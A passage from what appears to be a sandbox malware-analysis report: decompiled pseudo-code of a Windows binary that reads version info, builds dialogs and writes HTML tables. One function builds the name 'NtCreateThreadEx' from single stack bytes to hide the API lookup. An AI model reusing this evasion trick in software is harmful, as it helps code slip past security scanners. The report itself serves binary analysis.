                                                                                      						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                      							goto L5;
                                                                                      						}
                                                                                      					}
                                                                                      					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                      					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                      					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                      					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                      					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                      					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                      					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                      					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                      					_push(_t84);
                                                                                      					_t97 = 1;
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				return _t97;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                      • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                      • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                      • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                      • wcscpy.MSVCRT ref: 0040B128
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                      • API String ID: 1223191525-1542517562
                                                                                      • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                      • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 76%
                                                                                      			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                      				char _v8;
                                                                                      				char _v9;
                                                                                      				char _v10;
                                                                                      				char _v11;
                                                                                      				char _v12;
                                                                                      				char _v13;
                                                                                      				char _v14;
                                                                                      				char _v15;
                                                                                      				char _v16;
                                                                                      				char _v17;
                                                                                      				char _v18;
                                                                                      				char _v19;
                                                                                      				char _v20;
                                                                                      				char _v21;
                                                                                      				char _v22;
                                                                                      				char _v23;
                                                                                      				char _v24;
                                                                                      				struct HINSTANCE__* _t27;
                                                                                      
                                                                                      				if( *__esi != 0) {
                                                                                      					L3:
                                                                                      					return 1;
                                                                                      				}
                                                                                      				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                      				 *__esi = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosw");
                                                                                      					asm("stosb");
                                                                                      					_v24 = 0x4e;
                                                                                      					_v23 = 0x74;
                                                                                      					_v13 = 0x65;
                                                                                      					_v12 = 0x61;
                                                                                      					_v18 = 0x74;
                                                                                      					_v17 = 0x65;
                                                                                      					_v22 = 0x43;
                                                                                      					_v14 = 0x72;
                                                                                      					_v11 = 0x64;
                                                                                      					_v21 = 0x72;
                                                                                      					_v10 = 0x45;
                                                                                      					_v9 = 0x78;
                                                                                      					_v20 = 0x65;
                                                                                      					_v19 = 0x61;
                                                                                      					_v16 = 0x54;
                                                                                      					_v15 = 0x68;
                                                                                      					_v8 = 0;
                                                                                      					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                      • API String ID: 2574300362-1257427173
                                                                                      • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                      • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 63%
                                                                                      			E00407F8D(void* __eax) {
                                                                                      				struct _SHFILEINFOW _v692;
                                                                                      				void _v1214;
                                                                                      				short _v1216;
                                                                                      				void* _v1244;
                                                                                      				void* _v1248;
                                                                                      				void* _v1252;
                                                                                      				void* _v1256;
                                                                                      				void* _v1268;
                                                                                      				void* _t37;
                                                                                      				long _t38;
                                                                                      				long _t46;
                                                                                      				long _t48;
                                                                                      				long _t58;
                                                                                      				void* _t62;
                                                                                      				intOrPtr* _t64;
                                                                                      
                                                                                      				_t64 = ImageList_Create;
                                                                                      				_t62 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                      					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                      						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                      						 *(_t62 + 0x2a8) = _t48;
                                                                                      						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                      						_push( *(_t62 + 0x2a8));
                                                                                      					} else {
                                                                                      						_v692.hIcon = 0;
                                                                                      						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                      						_v1216 = 0;
                                                                                      						memset( &_v1214, 0, 0x208);
                                                                                      						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                      						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                      						 *(_t62 + 0x2a8) = _t58;
                                                                                      						_push(_t58);
                                                                                      					}
                                                                                      					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                      					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                      					 *(_t62 + 0x2ac) = _t46;
                                                                                      					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                      					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                      				}
                                                                                      				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                      				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                      				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                      				_v1244 = _t37;
                                                                                      				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                      				_t38 = GetSysColor(0xf);
                                                                                      				_v1248 = _t38;
                                                                                      				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                      				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                      				DeleteObject(_v1268);
                                                                                      				DeleteObject(_v1268);
                                                                                      				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                      			}

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407FD0
                                                                                      • memset.MSVCRT ref: 00407FE5
                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                      • LoadImageW.USER32 ref: 004080B4
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                      • LoadImageW.USER32 ref: 004080D1
                                                                                      • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                      • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                      • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                      • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                      • DeleteObject.GDI32(?), ref: 00408121
                                                                                      • DeleteObject.GDI32(?), ref: 00408127
                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                      • String ID:
                                                                                      • API String ID: 304928396-0
                                                                                      • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                      • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                      				int _v8;
                                                                                      				void _v518;
                                                                                      				long _v520;
                                                                                      				void _v1030;
                                                                                      				char _v1032;
                                                                                      				intOrPtr _t32;
                                                                                      				wchar_t* _t57;
                                                                                      				void* _t58;
                                                                                      				void* _t59;
                                                                                      				void* _t60;
                                                                                      
                                                                                      				_t58 = __esi;
                                                                                      				_v520 = 0;
                                                                                      				memset( &_v518, 0, 0x1fc);
                                                                                      				_v1032 = 0;
                                                                                      				memset( &_v1030, 0, 0x1fc);
                                                                                      				_t60 = _t59 + 0x18;
                                                                                      				_v8 = 1;
                                                                                      				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                      					_v8 = 0;
                                                                                      				}
                                                                                      				_t57 = _a4;
                                                                                      				 *_t57 = 0;
                                                                                      				if(_v8 != 0) {
                                                                                      					wcscpy(_t57, L"<font");
                                                                                      					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                      					if(_t32 > 0) {
                                                                                      						_push(_t32);
                                                                                      						_push(L" size=\"%d\"");
                                                                                      						_push(0xff);
                                                                                      						_push( &_v520);
                                                                                      						L0040B1EC();
                                                                                      						wcscat(_t57,  &_v520);
                                                                                      						_t60 = _t60 + 0x18;
                                                                                      					}
                                                                                      					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                      					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                      						_push(E0040ADC0(_t33,  &_v1032));
                                                                                      						_push(L" color=\"#%s\"");
                                                                                      						_push(0xff);
                                                                                      						_push( &_v520);
                                                                                      						L0040B1EC();
                                                                                      						wcscat(_t57,  &_v520);
                                                                                      					}
                                                                                      					wcscat(_t57, ">");
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                      					wcscat(_t57, L"<b>");
                                                                                      				}
                                                                                      				wcscat(_t57, _a8);
                                                                                      				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                      					wcscat(_t57, L"</b>");
                                                                                      				}
                                                                                      				if(_v8 != 0) {
                                                                                      					wcscat(_t57, L"</font>");
                                                                                      				}
                                                                                      				return _t57;
                                                                                      			}














                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                      • API String ID: 3143752011-1996832678
                                                                                      • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                      • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 97%
                                                                                      			E00403C03(void* __eflags) {
                                                                                      				void* __ebx;
                                                                                      				void* __ecx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t88;
                                                                                      				void* _t108;
                                                                                      				void* _t113;
                                                                                      				void* _t119;
                                                                                      				void* _t121;
                                                                                      				void* _t122;
                                                                                      				void* _t123;
                                                                                      				intOrPtr* _t124;
                                                                                      				void* _t134;
                                                                                      
                                                                                      				_t113 = _t108;
                                                                                      				E00403B3C(_t113);
                                                                                      				E00403B16(_t113);
                                                                                      				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                      				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                      				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                      				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                      				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                      				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                      				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                      				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                      				 *_t124 = 0x3ea;
                                                                                      				E0040AD85(GetDlgItem(??, ??));
                                                                                      				 *_t124 = 0x3f1;
                                                                                      				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                      				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                      				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                      				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                      				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                      				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                      				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                      				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                      				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                      				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                      				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                      				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                      				_t134 = _t124 + 0x78;
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                      				_t119 = 1;
                                                                                      				do {
                                                                                      					_t17 = _t119 + 0x280; // 0x281
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t119 = _t119 + 1;
                                                                                      				} while (_t119 <= 9);
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                      				_t121 = 1;
                                                                                      				do {
                                                                                      					_t21 = _t121 + 0x294; // 0x295
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t121 = _t121 + 1;
                                                                                      				} while (_t121 <= 3);
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                      				_t122 = 0;
                                                                                      				do {
                                                                                      					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t122 = _t122 + 1;
                                                                                      				} while (_t122 <= 0xd);
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                      				_t123 = 0;
                                                                                      				do {
                                                                                      					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t123 = _t123 + 1;
                                                                                      					_t143 = _t123 - 3;
                                                                                      				} while (_t123 < 3);
                                                                                      				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                      				E00403EC3(GetDlgItem, _t113);
                                                                                      				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                      				_t88 = E00402D78(_t113, _t143);
                                                                                      				E00402BEE(_t113);
                                                                                      				return _t88;
                                                                                      			}

















                                                                                      APIs
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                      • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                      • GetDlgItem.USER32 ref: 00403C2F
                                                                                      • SetWindowLongW.USER32 ref: 00403C39
                                                                                        • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                      • LoadImageW.USER32 ref: 00403C6A
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                      • LoadImageW.USER32 ref: 00403C7F
                                                                                      • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                      • GetDlgItem.USER32 ref: 00403CB0
                                                                                        • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                        • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      • GetDlgItem.USER32 ref: 00403CC2
                                                                                      • GetDlgItem.USER32 ref: 00403CD4
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • GetDlgItem.USER32 ref: 00403D64
                                                                                      • GetDlgItem.USER32 ref: 00403DC0
                                                                                      • GetDlgItem.USER32 ref: 00403DF0
                                                                                      • GetDlgItem.USER32 ref: 00403E20
                                                                                      • GetDlgItem.USER32 ref: 00403E4F
                                                                                      • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                      • GetDlgItem.USER32 ref: 00403E9B
                                                                                      • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1038210931-0
                                                                                      • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                      • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 56%
                                                                                      			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				void _v138;
                                                                                      				long _v140;
                                                                                      				void _v242;
                                                                                      				char _v244;
                                                                                      				void _v346;
                                                                                      				char _v348;
                                                                                      				void _v452;
                                                                                      				void _v962;
                                                                                      				signed short _v964;
                                                                                      				void* __esi;
                                                                                      				void* _t87;
                                                                                      				wchar_t* _t109;
                                                                                      				intOrPtr* _t124;
                                                                                      				signed int _t125;
                                                                                      				signed int _t140;
                                                                                      				signed int _t153;
                                                                                      				intOrPtr* _t154;
                                                                                      				signed int _t156;
                                                                                      				signed int _t157;
                                                                                      				void* _t159;
                                                                                      				void* _t161;
                                                                                      
                                                                                      				_t124 = __ebx;
                                                                                      				_v964 = _v964 & 0x00000000;
                                                                                      				memset( &_v962, 0, 0x1fc);
                                                                                      				_t125 = 0x18;
                                                                                      				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                      				asm("movsw");
                                                                                      				_t153 = 0;
                                                                                      				_v244 = 0;
                                                                                      				memset( &_v242, 0, 0x62);
                                                                                      				_v348 = 0;
                                                                                      				memset( &_v346, 0, 0x62);
                                                                                      				_v140 = 0;
                                                                                      				memset( &_v138, 0, 0x62);
                                                                                      				_t161 = _t159 + 0x3c;
                                                                                      				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                      				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                      				if(_t87 != 0xffffffff) {
                                                                                      					_push(E0040ADC0(_t87,  &_v964));
                                                                                      					_push(L" bgcolor=\"%s\"");
                                                                                      					_push(0x32);
                                                                                      					_push( &_v244);
                                                                                      					L0040B1EC();
                                                                                      					_t161 = _t161 + 0x18;
                                                                                      				}
                                                                                      				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                      				_v8 = _t153;
                                                                                      				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                      					while(1) {
                                                                                      						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                      						_v12 = _t156;
                                                                                      						_t157 = _t156 * 0x14;
                                                                                      						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                      							wcscpy( &_v140, L" nowrap");
                                                                                      						}
                                                                                      						_v32 = _v32 | 0xffffffff;
                                                                                      						_v28 = _v28 | 0xffffffff;
                                                                                      						_v24 = _v24 | 0xffffffff;
                                                                                      						_v20 = _t153;
                                                                                      						_t154 = _a8;
                                                                                      						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                      						E0040ADC0(_v32,  &_v348);
                                                                                      						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                      						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                      						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                      							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                      						} else {
                                                                                      							_push( *(_t157 + _v16 + 0x10));
                                                                                      							_push(E0040ADC0(_t106,  &_v964));
                                                                                      							_push(L"<font color=\"%s\">%s</font>");
                                                                                      							_push(0x2000);
                                                                                      							_push( *(_t124 + 0x68));
                                                                                      							L0040B1EC();
                                                                                      							_t161 = _t161 + 0x14;
                                                                                      						}
                                                                                      						_t109 =  *(_t124 + 0x64);
                                                                                      						_t140 =  *_t109 & 0x0000ffff;
                                                                                      						if(_t140 == 0 || _t140 == 0x20) {
                                                                                      							wcscat(_t109, L"&nbsp;");
                                                                                      						}
                                                                                      						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                      						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                      						_push( &_v140);
                                                                                      						_push( &_v348);
                                                                                      						_push( *(_t124 + 0x68));
                                                                                      						_push( &_v244);
                                                                                      						_push( &_v452);
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                      						L0040B1EC();
                                                                                      						_t161 = _t161 + 0x28;
                                                                                      						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                      						_v8 = _v8 + 1;
